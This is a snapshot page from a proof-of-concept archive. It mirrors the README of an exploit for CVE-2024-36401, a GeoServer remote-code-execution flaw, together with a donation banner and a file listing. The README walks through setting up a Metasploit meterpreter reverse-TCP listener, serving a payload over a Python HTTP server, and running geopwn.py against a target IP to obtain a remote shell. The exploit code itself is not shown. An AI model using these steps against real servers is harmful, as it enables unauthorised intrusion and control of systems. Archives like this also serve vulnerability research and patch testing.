Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-36401 PoC — GeoServer 安全漏洞

Source
Associated Vulnerability
Title:GeoServer 安全漏洞 (CVE-2024-36401)
Description:GeoServer是一个用 Java 编写的开源软件服务器。允许用户共享和编辑地理空间数据。 GeoServer 存在安全漏洞,该漏洞源于不安全地将属性名称解析为 XPath 表达式,可能导致远程代码执行。
Description
Proof-of-Concept Exploit for CVE-2024-36401 GeoServer 2.25.1
Readme
# CVE-2024-36401-PoC
Proof-of-Concept Exploit for CVE-2024-36401 GeoServer
Vulnerable Versions of GeoServer are prior to 2.23.6 | 2.24.4 | 2.25.2

To run...
1. Start a listener in Metasploit
   - ```
     msf6 > use exploit/multi/handler
     msf6 > exploit(multi/handler) > set payload linux/x64/meterpreter_reverse_tcp
     msf6 > exploit(multi/handler) > set LHOST 10.10.10.1 <--(set to your IP)
     msf6 > exploit(multi/handler) > set LPORT 1234 <--(you can leave default, or change to your preference)
     msf6 > exploit(multi/handler) > run

     [*] Started reverse TCP handler on 10.10.10.1:1234

      ```
2. Start HTTP server with Python
   - ```
     hacker@kali~> python3 -m http.server
     Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
     ```
3. Run exploit
   - ```
     hacker@kali~> python3 ./geopwn.py <target_domain_or_IP> <payload_URL> <LHOST> <LPORT>
     ```
File Snapshot

[4.0K] /data/pocs/9f6bfc71dd6af6763275272ac71de41f9abcbcd7 ├── [1.6K] geopwn.py └── [ 900] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.